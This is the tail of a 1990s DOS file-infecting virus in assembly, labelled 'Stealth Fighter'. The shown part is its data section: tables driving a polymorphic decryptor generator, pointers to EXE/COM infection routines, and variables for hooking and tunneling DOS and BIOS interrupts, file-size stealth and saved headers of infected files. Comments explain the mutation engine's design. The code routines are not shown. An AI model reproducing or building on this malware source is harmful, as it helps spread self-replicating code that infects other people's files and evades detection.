db 1Dh, 9Fh,0FDh, 8Bh, 1Eh, 6Eh, 78h, 86h
; ecc data finished, 90h bytes

string db 0ah,0dh
db '"Stealth Fighter,DEMO Part (3.2) : Next mutation 06/09/95"',0ah,0dh
db '$'

dw offset routines_various_memoff_or_rr
dw offset routines_copy_one_plus_imm
dw offset routines_math_with_immediate
dw offset routines_manage_math_twobytes
dw offset routines_one_byte_16reg
dw offset routines_copy_one_byte
dw offset routines_copy_one_word
dw offset routines_copy_many_bytes
dw offset routines_manage_jumps

dw offset jump_grb_returnroutine
dw offset jump_grb_returnroutine

; table with routines that generate a math operation on the memory using the
; pointer register, ie. xor [pnt],reg and such.
dw offset mom_routines_xor_mem
dw offset mom_routines_add_mem
dw offset mom_routines_sub_mem
dw offset mom_routines_ror_1_mem
dw offset mom_routines_rol_1_mem
dw offset mom_routines_ror_cl_mem
dw offset mom_routines_rol_cl_mem
dw offset mom_routines_neg_mem
dw offset mom_routines_not_mem
dw offset mom_routines_inc_mem
dw offset mom_routines_dec_mem

; same as before, but has the complementary instruction for at the same
; position of the previous one (ie. add in mom_table and sub in here)
dw offset mom_routines_xor_mem
dw offset mom_routines_sub_mem
dw offset mom_routines_add_mem
dw offset mom_routines_rol_1_mem
dw offset mom_routines_ror_1_mem
dw offset mom_routines_rol_cl_mem
dw offset mom_routines_ror_cl_mem
dw offset mom_routines_neg_mem
dw offset mom_routines_not_mem
dw offset mom_routines_dec_mem
dw offset mom_routines_inc_mem

prepare_file dw prepare_exe ; Offset of prepare_exe
dw prepare_com ; Offset of prepare_com
infect_file_ dw infect_exe ; Offset of infect_exe
dw infect_com ; Offset of infect_com

; table with complementary service routines used in the poly. they generate
; simple tasks with the given reg. the names should describe well the job.
dw offset s_routines_zero_reg_with_sub_reg_reg
dw offset s_routines_zero_reg_with_xor_reg_reg
dw offset s_routines_and_reg_with_zero
dw offset s_routines_mov_imm_in_reg
dw offset s_routines_mov_imm_in_reg
dw offset s_routines_or_reg_with_ffff

; table with routines for possible initialization steps, like counter and
; pointer initializations
dw offset i_routines_cnt_to_zero_and_pnt
dw offset i_routines_cnt_pnt_with_imm
dw offset i_routines_just_pointer
dw offset i_routines_cnt_to_zero_and_pnt
dw offset i_routines_cnt_to_zero_and_pnt
dw offset i_routines_cnt_pnt_with_imm
dw offset i_routines_just_pointer
dw offset


; table with routine for possible kinds of check if the decryption loop is
; finished. they are strictly connected to the way the pointer and counter were
; initialized at the beginning. so the routine for the check for the end of
; loop in this routine at Xth position is the one that complies with the
; initialization of the registers generated from the previous table with the
; entry at the Xth position.
dw offset endloop_check_counter_upwards
dw offset endloop_check_counter_down_wl
dw offset endloop_check_just_pointer
dw offset endloop_check_counter_upwards
dw offset endloop_check_counter_upwards
dw offset endloop_check_counter_down
dw offset endloop_check_just_pointer
dw offset endloop_check_counter_upwards

; table of possible regs used as pointers
db 6 ; si
db 7 ; di
db 5 ; bp
db 3 ; bx

ds_ equ word ptr $ ; Data segment (DS)
db 00h,00h,80h,00h
ds__ dw ? ; Data segment (DS)
db 08h dup(00h)
need_segovv dw 1
int08_count db ? ; Interrupt 08h counter
int08_stat db ? ; Status of interrupt 08h
; the next table is used to copy the rda body (from rda_basic_body) and include
; some garbage between the real rda instructions. each entry of the table will
; be interpreted as an instruction meaning how many bytes have to be copied and
; which registers can be used for garbage generation (so the garbage won't
; mess the needed registers and flags values).
; i won't comment all the steps one by one (which would be pretty boring :) )
; but will give the general scheme of the interpretation of the entries and
; a few examples. of course you should check the rda_basic_body part often for
; a correct interpretation.
; command byte combinations meanings, (checked in this order!):
; xxx0xxxx = just copy, lenght from [bx+1], keep old reg compatibility
; xxxxxx1x = garbage just with compatibility type 09
; xxxxx1xx = garbage just with compatibility type 0e
; xxxxxxxx = just copy, lenght from [bx+2], reg compatibilty in [bx+1]

db 18h ;
db 0EFh ; can use all regs as garbage
db 3 ; copy three bytes (the delta offset call)

db 0EFh ;
db 2 ; copy two bytes

dw 12 dup (02efh) ; as before

db 0EFh ;
db 10h ; copy 10h bytes. this bytes are the ones that are
; placed in rda_to_part_1 that has been choosed before

db 0EFh ;
db 20h ; copy 20h bytes. this bytes are the ones that are
; placed in rda_to_part_2 that has been choosed before
; the first part

db 0EFh ;
db 20h ; copy 20h bytes. this bytes are the second part
; of the ones placed in the rda_to_part_2

db 0A9h ; garbage without bx,dx
db 2 ; copy two bytes

db 18h ;
db 0EFh ;
db 2 ; copy two bytes

db 0A8h ; garbage without bx,dx,ax
db 2 ; copy two bytes

db 0EFh ; free garbage
db 2 ; copy two bytes

db 0A9h ; ...
db 2 ;

db 0AFh ;
db 2 ;

db 0AEh ;
db 4 ;

db 0AFh ;
db 2 ;

db 0AEh ;
db 3 ;

db 12h ;
db 0AFh ;
db 3 ;

db 18h ;
db 0AFh ;
db 2 ;

db 18h ;
db 0EFh ;
db 3 ;

db 0AEh ;
db 3 ;

db 18h ;
db 0AEh ;
db 3 ;

db 0ADh ;
db 2 ;

db 0ACh ;
db 3 ;

db 18h ;
db 0ACh ;
db 3 ;

db 0ADh ;
db 2 ;

db 0ACh ;
db 3 ;

db 18h ;
db 0ACh ;
db 3 ;

db 0A9h ;
db 2 ;

db 0A8h ;
db 3 ;

db 18h ;
db 0A8h ;
db 3 ;

db 0A9h ;
db 2 ;

db 18h ;
db 0EFh ;
db 3 ;

db 0AEh ;
db 2 ;

db 0A9h ;
db 2 ;

db 11h ;
db 0ABh ;
db 4 ;

db 11h ;
db 0AFh ;
db 4 ;

db 0A9h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0EFh ;
db 2 ;

db 12h ;

db 0AEh ;
db 3 ;

db 18h ;
db 0AEh ;
db 2 ;

db 18h ;
db 0EFh ;
db 3 ;

db 0AEh ;
db 2 ;

db 0AEh ;
db 3 ;

db 18h ;
db 0ABh ;
db 3 ;

db 0AAh ;
db 2 ;

db 0A6h ;
db 2 ;

db 0A2h ;
db 2 ;

db 12h ;
db 0A2h ;
db 4 ;

db 18h ;
db 0A2h ;
db 2 ;

db 0AAh ;
db 3 ;

db 0AEh ;
db 2 ;

db 0AEh ;
db 2 ;

db 0EFh ;
db 2 ;

db 11h ;
db 0AEh ;
db 4 ;

db 11h ;
db 0A6h ;
db 4 ;

db 0A4h ;
db 2 ;

db 0A0h ;
db 3 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0A0h ;
db 2 ;

db 0AAh ;
db 2 ;

db 0AAh ;
db 3 ;

db 0AAh ;
db 3 ;

db 11h ;
db 0AAh ;
db 4 ;

db 11h ;
db 0AAh ;
db 4 ;

db 0EFh ;
db 2 ;

db 13h ;
db 0AFh ;
db 5 ;

db 18h ;
db 0AFh ;
db 2 ;

db 18h ;
db 0EFh ;
db 3 ;

db 11h ;
db 0AEh ;
db 4 ;

db 11h ;
db 0AFh ;
db 4 ;

db 11h ;
db 0AEh ;
db 4 ;

db 11h ;
db 2Eh ;
db 4 ;

db 11h ;
db 2Eh ;
db 4 ;

db 18h ;
db 0EFh ;
db 3 ;

db 11h ;
db 0AEh ;
db 4 ;

db 11h ;
db 0AFh ;
db 4 ;

db 11h ;
db 0AEh ;
db 4 ;

db 11h ;
db 0AEh ;
db 4 ;

db 0A6h ;
db 2 ;

db 0A4h ;
db 3 ;

db 0A4h ;
db 2 ;

db 12h ;
db 0A4h ;
db 2 ;

db 0A4h ;
db 3 ;

db 18h ;
db 0A7h ;
db 2 ;

db 0AEh ;
db 2 ;

db 2Eh ;
db 3 ;

db 11h ;
db 2Eh ;
db 4 ;

db 2Eh ;
db 2 ;

db 11h ;
db 2Eh ;
db 5 ;

db 11h ;
db 2Eh ;
db 4 ;

db 0Eh ;
db 2 ;

db 12h ;
db 0Eh ;
db 2 ;

db 18h ;
db 0Eh ;
db 2 ;

db 18h ;
db 0EFh ;
db 3 ;

db 0Eh ;
db 3 ;

db 0Ch ;
db 2 ;

db 11h ;
db 0Ch ;
db 4 ;

db 0Ch ;

db 2 ;

db 0Eh ;
db 2 ;

db 11h ;
db 0Eh ;
db 4 ;

db 11h ;
db 0 ;
db 5 ;

db 0Eh ;
db 2 ;

db 0Eh ;
db 4 ;

db 11h ;
db 0Ch ;
db 4 ;

db 0Ch ;
db 2 ;

db 11h ;
db 4 ;
db 4 ;

db 0 ;
db 3 ;

db 0 ;
db 2 ;

db 15h ;
db 0AFh ;
db 4 ;

db 14h ;
db 0AFh ;
db 5 ;

db 14h ;
db 0AFh ;
db 2 ;

db 18h ;
db 0 ;
db 3 ;

db 0Ah ;
db 2 ;

db 0Ah ;
db 3 ;

db 0Ah ;
db 2 ;

db 12h ;
db 0Ah ;
db 2 ;

db 18h ;
db 0Ah ;
db 2 ;

db 18h ;
db 0EFh ;
db 3 ;

db 0AFh ;
db 2 ;

db 11h ;
db 0AFh ;
db 6 ;

db 11h ;
db 0AFh ;
db 6 ;

db 11h ;
db 0AFh ;
db 4 ;

db 0EFh ;
db 2 ;

db 11h ;
db 0ADh ;
db 4 ;

db 0ADh ;
db 2 ;

db 11h ;
db 2Dh ;
db 4 ;

db 29h ;
db 3 ;

db 9 ;
db 3 ;

db 8 ;
db 3 ;

db 8 ;
db 2 ;

db 14h ;
db 0AFh ;
db 2 ;

db 14h ;
db 0AFh ;
db 3 ;

db 14h ;
db 0AFh ;
db 2 ;

db 14h ;
db 0AFh ;
db 2 ;

db 14h ;
db 0AFh ;
db 2 ;

db 14h ;
db 0AFh ;
db 3 ;

db 14h ;
db 0AFh ;
db 2 ;

db 14h ;
db 0AFh ;
db 2 ;

db 14h ;
db 0AFh ;
db 4 ;

db 18h ;
db 8Bh ;
db 2 ;

db 0ABh ;
db 2 ;

db 11h ;
db 0ABh ;
db 6 ;

db 11h ;
db 0ABh ;
db 6 ;

db 0EFh ;
db 2 ;

db 0AEh ;
db 2 ;

db 0AEh ;
db 4 ;

db 0AFh ;
db 2 ;

db 18h ;
db 0EFh ;
db 3 ;

db 11h ;
db 0AFh ;
db 5 ;

db 18h ;
db 0AFh ;
db 3 ;

db 13h ;
db 0AFh ;
db 4 ;

db 18h ;
db 0AFh ;
db 2 ;

db 18h ;
db 0AFh ;
db 3 ;

db 11h ;
db 0AEh ;
db 4 ;

db 18h ;
db 0AEh ;
db 3 ;

db 11h ;
db 0AFh ;
db 4 ;

db 11h ;
db 0AFh ;
db 5 ;

db 18h ;
db 0AFh ;
db 3 ;

db 11h ;
db 0AEh ;
db 4 ;

db 18h ;
db 0AEh ;
db 3 ;

db 0A7h ;
db 2 ;

db 0A7h ;
db 4 ;

db 11h ;
db 2Fh ;
db 4 ;

db 2Eh ;
db 2 ;

db 11h ;
db 2Fh ;
db 4 ;

db 0AEh ;
db 3 ;

db 11h ;
db 0AFh ;
db 4 ;

db 18h ;
db 0ABh ;
db 3 ;

db 11h ;
db 2Bh ;
db 4 ;

db 12h ;
db 0AFh ;
db 7 ;

db 18h ;
db 0AFh ;
db 2 ;

db 18h ;
db 0 ;
db 3 ;

db 0 ;
db 2 ;

db 33h ; xor dx,ax
db 0D0h ;
db 3 ; add bp,ax
db 0E8h ;

db 2Bh ; sub dx,ax
db 0D0h ;
db 33h ; xor bp,ax
db 0E8h ;

db 3 ; add dx,ax
db 0D0h ;
db 33h ; xor bp,dx
db 0EAh ;

db 33h ; xor dx,ax
db 0D0h ;
db 2Bh ; sub bp,ax
db 0E8h ;

db 33h ; xor dx,ax
db 0D0h ;
db 33h ; xor bp,ax
db 0E8h ;

db 3 ; add dx,ax
db 0D0h ;
db 2Bh ; sub bp,ax
db 0E8h ;

db 3 ; add dx,ax
db 0D0h ;
db 33h ; xor bp,ax
db 0E8h ;

db 33h ; xor dx,ax
db 0D0h ;
db 2Bh ; sub bp,ax
db 0E8h ;


db 31h ; xor [bx],dx
db 17h ;
db 0D3h ; ror word ptr [bx],cl
db 0Fh ;

db 0D3h ; rol word ptr [bx],cl
db 7 ;
db 29h ; sub [bx],dx
db 17h ;

db 1 ; add [bx],dx
db 17h ;
db 0F7h ; neg word ptr [bx]
db 1Fh ;

db 0F7h ; not word ptr [bx]
db 17h ;
db 0FFh ; inc word ptr [bx]
db 7 ;

db 0FFh ; dec word ptr [bx]
db 0Fh ;
db 0D1h ; ror word ptr [bx],1
db 0Fh ;

db 0D1h ; rol word ptr [bx],1
db 7 ;
db 0D1h ; ror word ptr [bx],1
db 0Fh ;

db 0D1h ; rol word ptr [bx],1
db 7 ;
db 0FFh ; inc word ptr [bx]
db 7 ;

db 0FFh ; dec word ptr [bx]
db 0Fh ;
db 0F7h ; not word ptr [bx]
db 17h ;

db 0F7h ; neg word ptr [bx]
db 1Fh ;
db 29h ; sub [bx],dx
db 17h ;

db 1 ; add [bx],dx
db 17h ;
db 0D3h ; ror word ptr [bx],cl
db 0Fh ;

db 0D3h ; rol word ptr [bx],cl
db 7 ;
db 31h ; xor [bx],dx
db 17h ;

first_data db ?
second_data db ?
cache_stat db ? ; Status of disk cache
int21_addr dd ? ; Address of interrupt 21h
int08_addr dd ? ; Address of interrupt 08h
db 04h dup(?)
tunnel_addr dd ? ; Address of tunneled interrupt
tun_exit_off dw ? ; Offset of tunneled interrupt exit
sp_ dw ? ; Stack pointer
tun_int_stat db ? ; Status of the tunneled interrupt
tunnel_stat db ? ; Status of tunneling
int21_addr_ dd ? ; Address of interrupt 21h
int13_addr dd ? ; Address of interrupt 13h
tun_i13_stat db ? ; Status of tunneling interrupt 13h
virus_offset equ word ptr $+01h ; Offset of virus within infected ....
file_header_ db 1ah dup(?) ; File header
int01_addr dd ? ; Address of interrupt 01h
int03_addr dd ? ; Address of interrupt 03h
int2a_addr dd ? ; Address of interrupt 2ah
int13_addr_ dd ? ; Address of interrupt 13h
int24_addr dd ? ; Address of interrupt 24h
int21_addr__ dd ? ; Address of interrupt 21h
int01_addr_ dd ? ; Address of interrupt 01h
all_regs_initial_pnt dw 00h ; all regs are initialized at this
; point
file_attr dw ? ; File attributes
file_date dw ? ; File's date
file_time dw ? ; File's time
using_8_bits_register db 00h
register_compat db 00h ; for byte and for word
db 00h
garbage_register db 00h ; register to be used
garbage_word_byte dw 00h ; 00h byte, 01h word
mops_tmptable db 10h dup (00) ; math ops generated (ref to
; the table)
rda_garbage_limits db 00h ; limit the garbage in the rda steps
; to some given classes
poly_reg_di dw 00h
layer_di_pointer dw 00h ; value of DI, destination for code
; generation for this layer
poly_actual_layer dw 00h ; number of layer actually building
poly_layer_nr db 00h ; number of layers to create
pointer_direction db 00h
tipo_register dw 00h
counter_direction dw 00h ;
counter_register db 00h ;
pointer_register db 00h
restrict_grb_ax_is_used db 00h ; 01h restrict since ax is used
; 00h can create all kinda grg almost
layer_sp_pointer dw 00h ; value of SP of this layer, that is
; pointer to the layer data on stack
howmany_from_used_table dw 00h
poly_reg_si dw 00h
poly_total_lenght dw 00h
poly_reg_cx dw 00h ; body lenght for poly, initial CX
poly_reg_bx dw 00h
pointer_assign_pos dw 00h ; where the pointer is assigned
counter_assign_pos dw 00h ; where the counter is assigned
garbage_instr_number db 00h
counter_check_pos dw 00h ; where the comparation for the loop
; exit is done
dec_loop_begin_pos dw 00h ; pointer to begin of dec loop
pointer_to_end_after_rda_2 dw 00h
rda_add_to_lenght_rnd dw 00h
pnt_to_end_after_rda dw 00h ; pointer to end of everything after
; the rda execution
dec_loop_end_pos dw 00h ; pointer to end of dec loop
decryptor_ended_inmem_pnt dw 00h ; to the end of decryptor in mem
db ?
create_or_just_read db 00h ;
math_seq_stack_off dw 00h
filesize dd ? ; Filesize
reloca_entry dd ? ; Relocation entry
pointer_to_used_table dw 00h ; for the routine that gets a pointer
; to a table as a parameter
grb_jump_place dw 00h ; offset where to put jump, used for
; garbage generation
end_most_internal_layer dw 00h ; pointer to the end of the most
; internal layer in mem
dumb_cntr_ass dw 00h
ss__ dw ? ; Stack segment (SS)
sp__ dw ? ; Stack pointer (SP)
chkdsk_stat db ? ; Status of CHKDSK.EXE
filesize_ dw ? ; Filesize
filenam_addr dw ? ; Address of filename
dta_fcb_stat db ? ; Status of DTA or FCB stealth
filename db 0dh dup(?) ; Filename
db 05h dup(?)
rda_address_buffer: ; the adresses of each generated step
; will be inserted after this point
db 27fh dup(?)
db 90h dup(?)
db 5abfh dup(?)

end code_begin

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